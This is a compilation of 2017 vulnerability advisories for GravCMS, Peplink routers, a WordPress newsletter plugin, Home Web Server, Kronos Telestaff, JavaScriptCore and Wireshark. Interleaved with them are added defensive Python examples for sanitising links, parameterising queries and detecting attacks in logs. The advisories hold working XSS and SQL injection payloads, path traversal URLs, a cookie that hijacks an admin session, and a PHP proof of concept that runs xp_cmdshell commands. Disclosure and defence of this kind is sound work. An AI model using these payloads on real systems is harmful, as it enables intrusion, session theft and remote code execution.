SERVICE: www.vulnerability-lab.com
# Exploit Title: GravCMS Core (Admin Plugin) v1.4.2 - Persistent Cross-Site Scripting
# Date: 2017-06-07
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/download/core/grav-admin/1.2.4
# Version: 1.4.2
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT
Release Date:
=============
2017-06-07
Product & Service Introduction:
===============================
Grav is built and maintained by a team of dedicated and passionate developers, designers and users.
As Grav is an open source project we greatly appreciate user contribution and commitment. These are the key folks that make this all possible.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent vulnerability researcher discovered a Persistent Cross-Site Scripting Vulnerability in GravCMS Admin Plugin (v 1.4.2)
Vulnerability Disclosure Timeline:
==================================
2017-06-07: Found the vulnerability.
2017-06-07: Reported to vendor.
2017-06-07: Published.
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
Exploitation of the persistent xss web vulnerability requires a limited admin user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external
redirect to malicious sources and persistent manipulation of affected or connected web module context.
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by restricted user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Payload (Exploitation): [Click Me](javascript:alert(1))
[+] Manual steps to reproduce ..
1. Login with the admin or editor account in GravCMS
2. Go to edit page option (e.g http://127.0.0.1/cms/grav-admin/admin/pages/home)
3. Put the payload "[Click Me](javascript:alert(1))" (without quotes) in the content of page
4. Save Page!
5. Go to the index page (e.g http://127.0.0.1/cms/grav-admin/)
6. Click on "Click Me"
7. The Javascript execution occurs - Successful reproduce of the persistent cross site scripting vulnerability!
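The payload works because the page body is Markdown and the link target `javascript:alert(1)` reaches the rendered `href` unchanged. As an added example that is not Grav's code, the Python below shows the filter a Markdown renderer needs on link targets: strip control characters (so `java\tscript:` cannot slip past), compare the scheme case-insensitively against an allowlist, and let relative links through. The scheme allowlist is an assumption for the example.

```python
import re

# Assumed allowlist for this example; adjust per deployment.
SAFE_SCHEMES = {"http", "https", "mailto"}

# [text](url) or [text](url "title"); the url may contain one level of ()
_LINK_RE = re.compile(
    r"\[([^\]]*)\]\(\s*((?:[^()\s]|\([^()\s]*\))+)(\s+\"[^\"]*\")?\s*\)")
_CTRL_RE = re.compile(r"[\x00-\x20\x7f]")


def is_safe_url(url: str) -> bool:
    """Allow relative links and allowlisted schemes; reject javascript:,
    data:, vbscript: and variants hidden behind case or control characters."""
    cleaned = _CTRL_RE.sub("", url)          # 'java\tscript:' -> 'javascript:'
    head = cleaned.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True                          # no scheme at all: relative link
    scheme = cleaned.split(":", 1)[0].lower()
    return scheme in SAFE_SCHEMES


def sanitize_markdown_links(markdown: str) -> str:
    """Rewrite every [text](url) whose target is unsafe to [text](#)."""
    def repl(match):
        text, url = match.group(1), match.group(2)
        if is_safe_url(url):
            return match.group(0)
        return "[%s](#)" % text
    return _LINK_RE.sub(repl, markdown)


if __name__ == "__main__":
    # Constructed page content carrying the advisory's payload.
    page = "Welcome. [Click Me](javascript:alert(1)) or [Docs](https://getgrav.org/)"
    print(sanitize_markdown_links(page))
```

Run this on the stored content before it reaches the renderer, or at render time on the resulting `href`; filtering the visible Markdown alone is not enough if the renderer also accepts raw HTML.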
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in peplink balance routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" \
  --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" \
  -p "bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ \
  --flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device gives access to the SQLite session
database, which holds user and session variables. By using the following
cookie in a web request, it is possible to select a running administrator
session and use it for the attacker's login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
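As an added defensive example (not part of the X41 advisory and not Peplink's code), the following Python script builds a constructed in-memory SQLite stand-in for the session store, using only the table and column names the advisory's queries reveal, and shows why the bauth cookie above selects an administrator session when the cookie is concatenated into the query, and why the same cookie matches nothing once the lookup is parameterised. Session ids and row contents are constructed; the username-enumeration cookie neutralises the quote the server appends with the same "--" suffix the sqlmap invocation above uses.

```python
import sqlite3
from typing import Optional

# Table and column names come from the queries in the advisory; the rows are
# constructed for this example and are not real Peplink data.
def make_session_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, sessionid TEXT);
        CREATE TABLE sessionsvariables (id INTEGER, name TEXT, value TEXT);
        INSERT INTO sessions VALUES (7, 'adminsession0001'), (8, 'guestsession0002');
        INSERT INTO sessionsvariables VALUES
            (7, 'rwa', '1'), (7, 'username', 'admin'),
            (8, 'rwa', '0'), (8, 'username', 'guest');
    """)
    return con

# The cookie value quoted in the advisory, joined onto one line. The final
# "or '1'='2" absorbs the closing quote the server appends.
ADMIN_SESSION_COOKIE = (
    "-12' or id IN (select s.id from sessions as s left join "
    "sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') "
    "or '1'='2"
)

# The username-enumeration query from the advisory, as a cookie value: the
# trailing "--" comments out the quote the server appends.
USERNAME_PROBE_COOKIE = (
    "-14' or id IN (select s.id from sessions as s left join "
    "sessionsvariables as v on v.id=s.id where v.name='username' "
    "and substr(v.value,1,3)='adm') --"
)

def lookup_session_vulnerable(con: sqlite3.Connection, bauth: str) -> Optional[int]:
    # String concatenation: the cookie text becomes part of the SQL statement,
    # so the OR clauses inside it are evaluated by SQLite.
    sql = "SELECT id FROM sessions WHERE sessionid = '" + bauth + "'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def lookup_session_safe(con: sqlite3.Connection, bauth: str) -> Optional[int]:
    # Bound parameter: the whole cookie value is compared as one string and
    # cannot change the structure of the statement.
    row = con.execute("SELECT id FROM sessions WHERE sessionid = ?", (bauth,)).fetchone()
    return row[0] if row else None

def is_admin_session(con: sqlite3.Connection, session_id: int) -> bool:
    # The rwa session variable is what the advisory's payload selects on.
    row = con.execute(
        "SELECT value FROM sessionsvariables WHERE id = ? AND name = 'rwa'",
        (session_id,),
    ).fetchone()
    return bool(row) and row[0] == "1"

if __name__ == "__main__":
    db = make_session_db()
    print("vulnerable lookup:", lookup_session_vulnerable(db, ADMIN_SESSION_COOKIE))
    print("parameterised lookup:", lookup_session_safe(db, ADMIN_SESSION_COOKIE))
```

The parameterised lookup is the whole fix: the cookie is compared as data, so neither the rwa selector nor the substr() oracle can influence which row is returned.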
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross-site request forgery attacks. This allows an attacker to
execute commands if a logged-in user visits a malicious website. This
can for example be used to change the credentials of the administrative
web interface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the
orig_url parameter to trigger a cross-site scripting issue in
/guest/preview.cgi. The injection lands directly inside existing JavaScript.
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged-in user can delete arbitrary files on the Peplink devices by
abusing /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided in the upfile.path parameter, the file at that path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged-in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the web interface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, sent GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results sent back to the vendor
2017-06-01 Remaining test results sent back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-012
Advisory Title: WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Tribulant Newsletters Plugin
Language: PHP
Version: 4.6.4.2 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/29
Risk: Medium
1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.
More information about WebScanner is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.
According to wordpress.org, it has more than 9,000 active installs.
Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin
3. Vulnerability Description
============================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.
3.1 File Disclosure
----
Input: $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
3.2 Cross-Site Scripting
----
Input: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.3 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: The subscriber id (parameter "id") must exist. Value 1 is a good starting guess.
3.4 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.5 Cross-Site Scripting
----
Input: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>
3.6 Cross-Site Scripting
----
Input: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3.7 Cross-Site Scripting
----
Input: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.8 Cross-Site Scripting
----
Input: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded, update released
2017/05/29 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for a free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description :
-------------
Home Web Server allows CGI programs located in the /cgi-bin folder to be called via POST. However, by using a directory traversal,
it is possible to run any executable present on the remote host.
Instructions:
-------------
- Start Home Web Server.
- Run this exploit from a remote Kali machine with netcat as shown below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in the login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
The exploit requires a valid "code" in the post body. However, in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4-digit number and can be easily discovered in ~5000 requests.
Proof of concept
================
PoC 1 - extract data from database
Example: extract benign data, e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
compare timing with
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
PoC 2 - Execute Code Remotely
Example: inject benign code, e.g. ping a remote system
<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert your own host here to detect a DNS lookup and/or ping, or insert another command
$code = 'XXXX'; // insert valid code
$target_url = ''; // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload = "DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload = str_replace(" ", "%20", $payload);
$postdata = "device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);
curl_close($ch);

// Encode a string as a 0x-prefixed hex literal so it can be passed without quotes.
function strToHex($string) {
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $ord = ord($string[$i]);
        $hexCode = dechex($ord);
        $hex .= substr('0'.$hexCode, -2);
    }
    return "0x".strtoupper($hex);
}
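The two PoCs above leave distinctive traces in web server logs: a login POST whose "user" field carries a quote-and-parenthesis breakout followed by T-SQL, a WAITFOR DELAY whose latency shows up in the response time, or an xp_cmdshell call. As an added detection example (not part of the Illumant advisory and not Kronos code), the following Python script parses constructed access-log lines in an assumed format that records the POST body and response latency, and flags the request shapes shown in the PoCs. The log format, client addresses, hex command and latency threshold are all constructed.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Constructed access-log lines in an assumed format:
#   <timestamp> <client> <method> <path> <status> <latency>ms body=<urlencoded body>
# The request shapes mirror the PoCs in the advisory; none of this is real traffic.
SAMPLE_LOG = """\
2017-06-01T10:00:01Z 198.51.100.7 POST /servlet/ServletController.asp 200 310ms body=device=stdbrowser&action=doLogin&user=jsmith&pwd=secret&code=1234
2017-06-01T10:00:05Z 203.0.113.9 POST /servlet/ServletController.asp 200 12210ms body=device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=1234
2017-06-01T10:00:09Z 203.0.113.9 POST /servlet/ServletController.asp 200 420ms body=device=stdbrowser&action=doLogin&user=')DECLARE%20@c%20VARCHAR(280);SET%20@c=0x70696e67;EXEC%20master..xp_cmdshell%20@c;--&pwd=test&code=1234
2017-06-01T10:01:30Z 198.51.100.7 POST /servlet/ServletController.asp 200 11050ms body=device=stdbrowser&action=doLogin&user=mjones&pwd=secret&code=1234
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)ms body=(.*)$")

# Content rules, applied to every decoded form field.
RULES = {
    "waitfor_delay": re.compile(r"waitfor\s+delay", re.I),
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "quote_paren_breakout": re.compile(r"'\)\s*(?:if|or|and|declare|;|--)", re.I),
}
SLOW_LOGIN_MS = 10_000   # assumed threshold; the PoC's delay is 12 s

def parse_body(body: str) -> Dict[str, str]:
    """Split an application/x-www-form-urlencoded body without treating ';' as a
    separator (older parse_qs versions do, which would split the payload)."""
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def analyse_log(text: str) -> List[Tuple[int, List[str]]]:
    """Return (line_number, reasons) for every flagged request."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        match = LINE_RE.match(line)
        if not match:
            continue
        _ts, _client, _method, _path, _status, latency_ms, body = match.groups()
        fields = parse_body(body)
        reasons = []
        # Timing signal: a login that takes far longer than normal is what a
        # WAITFOR DELAY probe produces (a slow database can too, so it is one
        # signal among several, not a verdict on its own).
        if fields.get("action") == "doLogin" and int(latency_ms) >= SLOW_LOGIN_MS:
            reasons.append("slow_login")
        for name, pattern in RULES.items():
            if any(pattern.search(value) for value in fields.values()):
                reasons.append(name)
        if reasons:
            findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    for number, reasons in analyse_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

Line 4 of the sample is a benign login that merely took long, and it is flagged for latency alone; correlating the content rules with the timing signal is what separates it from the probe on line 2.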
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
Solution
================
From Vendor:
Though there is no further action needed after the installation of the update, there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of the vulnerability from security contact at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 2^32 + 0x40000 (containing the repeated byte 0x41).
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
